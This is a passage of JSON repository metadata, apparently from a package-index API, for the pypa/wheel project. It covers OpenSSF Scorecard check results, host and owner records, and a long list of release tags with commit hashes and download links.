vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","k